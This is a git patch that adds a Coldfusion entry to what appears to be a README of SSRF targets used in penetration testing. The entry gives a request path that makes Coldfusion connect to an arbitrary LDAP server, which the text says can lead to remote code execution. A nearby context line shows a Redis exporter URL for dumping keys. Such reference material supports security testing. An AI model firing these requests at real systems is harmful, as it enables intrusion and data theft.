From a2d4467d7d3c287699c9c4568d94eb85426efa94 Mon Sep 17 00:00:00 2001
From: Elweth <39616215+elweth-sec@users.noreply.github.com>
Date: Wed, 6 Nov 2024 15:45:22 +0100
Subject: [PATCH] Update README.md

---
 README.md | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)

diff --git a/README.md b/README.md
index 7193395..9b08bd4 100644
--- a/README.md
+++ b/README.md
@@ -93,6 +93,8 @@ The response times are slower or faster depending on whether or not the URL you
 - [W3 Total Cache](#w3)
 - [Docker](#docker)
 - [Gitlab Prometheus Redis Exporter](#redisexporter)
+- [Coldfusion](#coldfusion)
+
 
 **Possible via Gopher**
 
@@ -616,6 +618,21 @@ The following endpoint will allow an attacker to dump all the keys in the redis
 http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
 ```
 
+<div id="coldfusion"></div>
+
+## Coldfusion
+
+**Commonly bound ports: 80,443,8500**
+
+Some versions of Coldfusion allow you to connect arbitrarily to an LDAP server using a URL passed as a GET parameter.
+- [https://www.exploit-db.com/exploits/50781](https://www.exploit-db.com/exploits/50781)
+
+This can lead to Remote Code Execution through LDAP Deserialization.
+
+```
+/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=SSRF_CANARY&vport=389&vstart=&vusername=&vpassword=&returnformat=json
+```
+
 ----------
 
 **Possible via Gopher**